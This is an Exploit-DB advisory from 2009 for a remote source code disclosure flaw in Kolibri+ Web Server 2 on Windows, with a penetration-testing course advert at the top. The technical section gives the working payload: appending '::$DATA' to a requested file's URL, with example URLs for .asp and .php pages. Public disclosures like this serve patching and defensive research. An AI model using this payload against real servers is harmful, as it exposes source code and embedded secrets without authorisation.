Kolibri+ Web Server 2 - Arbitrary Source Code Disclosure (2)

EDB-ID:

9650

CVE:

N/A


Author:

Dr_IDE

Type:

remote


Platform:

Windows

Date:

2009-09-11


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

#################################################################################
#                                                                        	#
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure 		#
# aka:		More fun with Kolibri+ 2 webserver 		         	#
# Found By:	Dr_IDE								#
# Tested On:	Windows XPSP3                                            	#
#                                                                        	#
#################################################################################

- Description -

Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
the application available. 

This vulnerability is similar to the one reported earlier by Skull-HacKeR.

Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
(download in this case) by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][::$DATA]

	http://172.16.2.101/default.asp::$DATA

	http://172.16.2.101/index.php::$DATA

# milw0rm.com [2009-09-11]